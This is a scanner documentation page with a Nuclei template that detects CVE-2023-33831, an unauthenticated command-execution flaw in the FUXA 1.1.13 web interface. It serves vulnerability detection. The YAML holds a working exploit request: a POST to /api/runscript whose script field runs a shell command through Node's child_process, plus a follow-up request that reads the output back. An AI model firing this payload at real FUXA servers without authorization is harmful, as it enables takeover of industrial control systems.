FUXA - Unauthenticated Remote Code Execution
ID: CVE-2023-33831
Severity: critical
Author: gy741
Tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
Description
Section titled “Description”A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
YAML Source
Section titled “YAML Source”id: CVE-2023-33831
info: name: FUXA - Unauthenticated Remote Code Execution author: gy741 severity: critical description: | A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-33831 - https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831 - https://github.com/codeb0ss/CVE-2023-33831-PoC - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-33831 cwe-id: CWE-77 epss-score: 0.21555 epss-percentile: 0.96432 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: frangoteam product: fuxa fofa-query: - title="FUXA" - title="fuxa" tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauthvariables: filename: "{{rand_base(6)}}"
http: - raw: - | POST /api/runscript HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}} - | GET /_images/{{filename}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_1 words: - 'Script OK:'
- type: word part: body_2 words: - 'uid' - 'gid' - 'groups' condition: and
- type: status status: - 200# digest: 4a0a0047304502203a0d9c7bbdca6c1e2e5338b4edf7eb46978d6e089ae886961414b5ba52f6859d022100c648e65757d19f86317433cef1da27597ce1a51cecdcbdcb5d05bdef971c70da:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33831.yaml"